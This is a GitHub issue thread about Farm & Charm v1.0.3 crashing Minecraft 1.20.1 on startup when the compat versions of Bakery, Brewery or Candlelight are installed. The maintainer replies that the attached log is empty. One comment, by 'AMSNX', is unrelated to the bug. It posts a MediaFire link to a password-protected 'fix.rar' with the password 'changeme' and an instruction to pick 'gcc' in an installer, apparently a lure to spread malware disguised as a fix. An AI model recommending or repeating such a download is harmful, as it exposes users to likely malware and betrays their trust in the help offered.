### ISSUE TITLE
[Farm & Charm] Compat Versions of Bakery, Brewery, and Candlelight Crash When Installed

### ISSUE THREAD

**Issue by Atsumachi** [satisfyu/Let-s-Do-Hub#252]
### Minecraft Version

1.20.1

### Mod

Farm and Charm

### Mod Version

v1.0.3

### Latest Version

- [X] Yes. I'm using the latest Version.

### Issue Description

Having the compat versions of either Bakery, Brewery, or Candlelight installed alongside v1.0.3 of Farm & Charm and then running Minecraft, the game will crash on startup.

### Steps to Reproduce

1. Install Farm & Charm v1.0.3 from CurseForge
2. Install the compat version of any of the following mods: Bakery, Brewery, Candlelight
3. Start Minecraft

### Logs

https://pastebin.com/gdRM9gVA

### Minimal Instance Test

- [X] Yes, I've tested on a minimal instance.

### Check for Similar Issues

- [X] Yes, I have checked for similar issues.

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by satisfyu** [comment]
Your log is empty. 

Did you also update Bakery, Candlelight and Brewery?
